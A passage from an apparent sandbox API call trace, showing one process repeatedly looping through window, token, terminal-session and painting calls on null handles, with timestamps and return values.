fUnknown=0) [0221.387] SetForegroundWindow (hWnd=0x0) returned 0 [0221.387] BringWindowToTop (hWnd=0x0) returned 0 [0221.387] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x558) returned 1 [0221.387] GetTokenInformation (in: TokenHandle=0x558, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.387] GetLastError () returned 0x7a [0221.387] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.387] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.388] WTSFreeMemory (pMemory=0x0) [0221.388] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.388] TextOutW (hdc=0x0, x=2034, y=4849, lpString="", c=0) returned 1 [0221.388] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.388] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.388] GetTickCount () returned 0xe474 [0221.397] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.397] SetForegroundWindow (hWnd=0x0) returned 0 [0221.397] BringWindowToTop (hWnd=0x0) returned 0 [0221.397] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x55c) returned 1 [0221.397] GetTokenInformation (in: TokenHandle=0x55c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.397] GetLastError () returned 0x7a [0221.397] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.397] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.397] WTSFreeMemory (pMemory=0x0) [0221.398] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.398] TextOutW (hdc=0x0, x=2044, y=4874, lpString="", c=0) returned 1 [0221.398] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.398] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.398] GetTickCount () returned 0xe484 [0221.400] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.400] SetForegroundWindow (hWnd=0x0) returned 0 [0221.400] BringWindowToTop (hWnd=0x0) returned 0 [0221.400] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x560) returned 1 [0221.400] GetTokenInformation (in: TokenHandle=0x560, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.400] GetLastError () returned 0x7a [0221.400] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.400] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.401] WTSFreeMemory (pMemory=0x0) [0221.401] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.401] TextOutW (hdc=0x0, x=2054, y=4899, lpString="", c=0) returned 1 [0221.401] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.401] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.401] GetTickCount () returned 0xe484 [0221.401] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.401] SetForegroundWindow (hWnd=0x0) returned 0 [0221.402] BringWindowToTop (hWnd=0x0) returned 0 [0221.402] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x564) returned 1 [0221.402] GetTokenInformation (in: TokenHandle=0x564, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.402] GetLastError () returned 0x7a [0221.402] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.402] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.402] WTSFreeMemory (pMemory=0x0) [0221.402] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.402] TextOutW (hdc=0x0, x=2064, y=4924, lpString="", c=0) returned 1 [0221.402] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.402] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.402] GetTickCount () returned 0xe484 [0221.402] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.403] SetForegroundWindow (hWnd=0x0) returned 0 [0221.403] BringWindowToTop (hWnd=0x0) returned 0 [0221.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x568) returned 1 [0221.403] GetTokenInformation (in: TokenHandle=0x568, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.403] GetLastError () returned 0x7a [0221.403] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.403] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.403] WTSFreeMemory (pMemory=0x0) [0221.403] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.403] TextOutW (hdc=0x0, x=2074, y=4949, lpString="", c=0) returned 1 [0221.403] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.403] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.404] GetTickCount () returned 0xe484 [0221.404] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.404] SetForegroundWindow (hWnd=0x0) returned 0 [0221.404] BringWindowToTop (hWnd=0x0) returned 0 [0221.404] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x56c) returned 1 [0221.404] GetTokenInformation (in: TokenHandle=0x56c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.404] GetLastError () returned 0x7a [0221.404] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.404] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.404] WTSFreeMemory (pMemory=0x0) [0221.404] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.404] TextOutW (hdc=0x0, x=2084, y=4974, lpString="", c=0) returned 1 [0221.404] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.405] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.405] GetTickCount () returned 0xe484 [0221.405] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.405] SetForegroundWindow (hWnd=0x0) returned 0 [0221.405] BringWindowToTop (hWnd=0x0) returned 0 [0221.405] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x570) returned 1 [0221.405] GetTokenInformation (in: TokenHandle=0x570, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.405] GetLastError () returned 0x7a [0221.405] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.405] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.406] WTSFreeMemory (pMemory=0x0) [0221.406] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.406] TextOutW (hdc=0x0, x=2094, y=4999, lpString="", c=0) returned 1 [0221.406] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.406] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.406] GetTickCount () returned 0xe484 [0221.406] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.406] SetForegroundWindow (hWnd=0x0) returned 0 [0221.406] BringWindowToTop (hWnd=0x0) returned 0 [0221.406] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x574) returned 1 [0221.406] GetTokenInformation (in: TokenHandle=0x574, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.406] GetLastError () returned 0x7a [0221.406] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.406] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.407] WTSFreeMemory (pMemory=0x0) [0221.407] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.407] TextOutW (hdc=0x0, x=2104, y=5024, lpString="", c=0) returned 1 [0221.407] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.407] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.407] GetTickCount () returned 0xe484 [0221.407] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.407] SetForegroundWindow (hWnd=0x0) returned 0 [0221.407] BringWindowToTop (hWnd=0x0) returned 0 [0221.407] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x578) returned 1 [0221.407] GetTokenInformation (in: TokenHandle=0x578, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.407] GetLastError () returned 0x7a [0221.407] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.407] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.408] WTSFreeMemory (pMemory=0x0) [0221.408] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.408] TextOutW (hdc=0x0, x=2114, y=5049, lpString="", c=0) returned 1 [0221.408] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.408] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.408] GetTickCount () returned 0xe484 [0221.408] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.408] SetForegroundWindow (hWnd=0x0) returned 0 [0221.408] BringWindowToTop (hWnd=0x0) returned 0 [0221.408] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x57c) returned 1 [0221.408] GetTokenInformation (in: TokenHandle=0x57c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.408] GetLastError () returned 0x7a [0221.408] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.408] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.409] WTSFreeMemory (pMemory=0x0) [0221.409] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.409] TextOutW (hdc=0x0, x=2124, y=5074, lpString="", c=0) returned 1 [0221.409] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.409] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.409] GetTickCount () returned 0xe484 [0221.409] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.409] SetForegroundWindow (hWnd=0x0) returned 0 [0221.409] BringWindowToTop (hWnd=0x0) returned 0 [0221.410] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x580) returned 1 [0221.410] GetTokenInformation (in: TokenHandle=0x580, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.410] GetLastError () returned 0x7a [0221.410] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.410] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.410] WTSFreeMemory (pMemory=0x0) [0221.410] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.410] TextOutW (hdc=0x0, x=2134, y=5099, lpString="", c=0) returned 1 [0221.410] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.410] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.410] GetTickCount () returned 0xe484 [0221.410] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.411] SetForegroundWindow (hWnd=0x0) returned 0 [0221.411] BringWindowToTop (hWnd=0x0) returned 0 [0221.411] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x584) returned 1 [0221.411] GetTokenInformation (in: TokenHandle=0x584, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.411] GetLastError () returned 0x7a [0221.411] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.411] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.415] WTSFreeMemory (pMemory=0x0) [0221.415] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.415] TextOutW (hdc=0x0, x=2144, y=5124, lpString="", c=0) returned 1 [0221.415] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.415] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.415] GetTickCount () returned 0xe4a3 [0221.415] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.415] SetForegroundWindow (hWnd=0x0) returned 0 [0221.417] BringWindowToTop (hWnd=0x0) returned 0 [0221.417] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x588) returned 1 [0221.417] GetTokenInformation (in: TokenHandle=0x588, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.417] GetLastError () returned 0x7a [0221.417] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.417] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.418] WTSFreeMemory (pMemory=0x0) [0221.418] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.418] TextOutW (hdc=0x0, x=2154, y=5149, lpString="", c=0) returned 1 [0221.418] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.418] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.418] GetTickCount () returned 0xe4a3 [0221.418] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.418] SetForegroundWindow (hWnd=0x0) returned 0 [0221.419] BringWindowToTop (hWnd=0x0) returned 0 [0221.419] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x58c) returned 1 [0221.419] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.419] GetLastError () returned 0x7a [0221.419] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.419] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.420] WTSFreeMemory (pMemory=0x0) [0221.420] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.420] TextOutW (hdc=0x0, x=2164, y=5174, lpString="", c=0) returned 1 [0221.420] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.420] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.420] GetTickCount () returned 0xe4a3 [0221.420] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.420] SetForegroundWindow (hWnd=0x0) returned 0 [0221.420] BringWindowToTop (hWnd=0x0) returned 0 [0221.420] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x590) returned 1 [0221.420] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.420] GetLastError () returned 0x7a [0221.420] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.420] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.421] WTSFreeMemory (pMemory=0x0) [0221.421] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.421] TextOutW (hdc=0x0, x=2174, y=5199, lpString="", c=0) returned 1 [0221.421] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.421] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.421] GetTickCount () returned 0xe4a3 [0221.422] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.422] SetForegroundWindow (hWnd=0x0) returned 0 [0221.422] BringWindowToTop (hWnd=0x0) returned 0 [0221.422] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x594) returned 1 [0221.423] GetTokenInformation (in: TokenHandle=0x594, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.423] GetLastError () returned 0x7a [0221.423] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.423] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.423] WTSFreeMemory (pMemory=0x0) [0221.423] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.423] TextOutW (hdc=0x0, x=2184, y=5224, lpString="", c=0) returned 1 [0221.423] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.424] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.424] GetTickCount () returned 0xe4a3 [0221.424] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.424] SetForegroundWindow (hWnd=0x0) returned 0 [0221.424] BringWindowToTop (hWnd=0x0) returned 0 [0221.424] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x598) returned 1 [0221.424] GetTokenInformation (in: TokenHandle=0x598, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.424] GetLastError () returned 0x7a [0221.424] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.424] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.425] WTSFreeMemory (pMemory=0x0) [0221.425] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.425] TextOutW (hdc=0x0, x=2194, y=5249, lpString="", c=0) returned 1 [0221.425] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.425] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.425] GetTickCount () returned 0xe4a3 [0221.425] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.426] SetForegroundWindow (hWnd=0x0) returned 0 [0221.426] BringWindowToTop (hWnd=0x0) returned 0 [0221.426] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x59c) returned 1 [0221.426] GetTokenInformation (in: TokenHandle=0x59c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.426] GetLastError () returned 0x7a [0221.426] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.426] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.426] WTSFreeMemory (pMemory=0x0) [0221.426] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.426] TextOutW (hdc=0x0, x=2204, y=5274, lpString="", c=0) returned 1 [0221.426] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.426] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.427] GetTickCount () returned 0xe4a3 [0221.427] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.427] SetForegroundWindow (hWnd=0x0) returned 0 [0221.427] BringWindowToTop (hWnd=0x0) returned 0 [0221.431] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5a0) returned 1 [0221.431] GetTokenInformation (in: TokenHandle=0x5a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.431] GetLastError () returned 0x7a [0221.431] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.431] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.432] WTSFreeMemory (pMemory=0x0) [0221.432] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.433] TextOutW (hdc=0x0, x=2214, y=5299, lpString="", c=0) returned 1 [0221.433] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.433] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.433] GetTickCount () returned 0xe4b2 [0221.433] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.433] SetForegroundWindow (hWnd=0x0) returned 0 [0221.433] BringWindowToTop (hWnd=0x0) returned 0 [0221.433] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5a4) returned 1 [0221.433] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.433] GetLastError () returned 0x7a [0221.433] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.433] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.434] WTSFreeMemory (pMemory=0x0) [0221.434] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.434] TextOutW (hdc=0x0, x=2224, y=5324, lpString="", c=0) returned 1 [0221.434] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.434] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.434] GetTickCount () returned 0xe4b2 [0221.434] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.434] SetForegroundWindow (hWnd=0x0) returned 0 [0221.434] BringWindowToTop (hWnd=0x0) returned 0 [0221.434] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: 